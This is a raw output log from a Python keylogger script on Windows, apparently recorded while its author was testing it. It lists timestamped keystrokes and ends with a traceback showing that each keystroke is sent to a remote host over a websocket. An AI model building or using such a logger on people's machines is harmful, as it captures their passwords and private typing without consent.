2020-05-31 17:01:03,841: Key.alt_l:
2020-05-31 17:01:03,973: Key.tab:
2020-05-31 17:01:06,782: 'd':
2020-05-31 17:01:06,874: 'a':
2020-05-31 17:01:06,957: 's':
2020-05-31 17:01:07,092: 'd':
2020-05-31 17:01:07,224: 'a':
2020-05-31 17:01:07,293: 's':
2020-05-31 17:01:07,372: 'd':
2020-05-31 17:01:07,500: 'a':
2020-05-31 17:01:07,548: 's':
2020-05-31 17:01:07,621: 'd':
2020-05-31 17:01:11,343: 'd':
2020-05-31 17:01:11,491: 'a':
2020-05-31 17:01:11,540: 's':
2020-05-31 17:01:11,676: 'd':
2020-05-31 17:01:11,812: 'a':
2020-05-31 17:01:11,860: 's':
2020-05-31 17:01:11,940: 'd':
2020-05-31 17:01:12,077: 'a':
2020-05-31 17:01:12,148: 's':
2020-05-31 17:01:12,220: 'd':
2020-05-31 17:01:12,356: 'a':
2020-05-31 17:01:12,388: 's':
2020-05-31 17:01:12,484: 'd':
2020-05-31 17:01:13,167: Key.alt_l:
2020-05-31 17:01:13,237: Key.tab:
2020-05-31 17:01:26,407: Key.ctrl_l:
2020-05-31 17:01:26,486: '\x03':
2020-05-31 17:01:31,323: Key.ctrl_l:
2020-05-31 17:01:31,396: '\x13':
2020-05-31 17:02:31,373: Key.enter:
2020-05-31 17:02:31,884: '/':
2020-05-31 17:02:32,020: '/':
2020-05-31 17:02:32,817: Key.space:
2020-05-31 17:02:33,273: 'i':
2020-05-31 17:02:33,396: 'f':
2020-05-31 17:02:33,564: Key.space:
2020-05-31 17:02:34,796: 'o':
2020-05-31 17:02:34,797: Unhandled exception in listener callback:
Traceback (most recent call last):
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pynput\_util\__init__.py", line 162, in inner
    return f(self, *args, **kwargs)
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pynput\keyboard\_win32.py", line 280, in _process
    self.on_press(key)
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pynput\_util\__init__.py", line 78, in inner
    if f(*args) is False:
  File "keylogger.py", line 33, in on_press
    ws.send('{"timestamp": "' + str(datetime.now()) +
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\websocket\_core.py", line 253, in send
    return self.send_frame(frame)
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\websocket\_core.py", line 279, in send_frame
    l = self._send(data)
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\websocket\_core.py", line 449, in _send
    return send(self.sock, data)
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\websocket\_socket.py", line 157, in send
    return _send()
  File "C:\Users\ionut\AppData\Local\Programs\Python\Python38-32\lib\site-packages\websocket\_socket.py", line 139, in _send
    return sock.send(data)
ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host
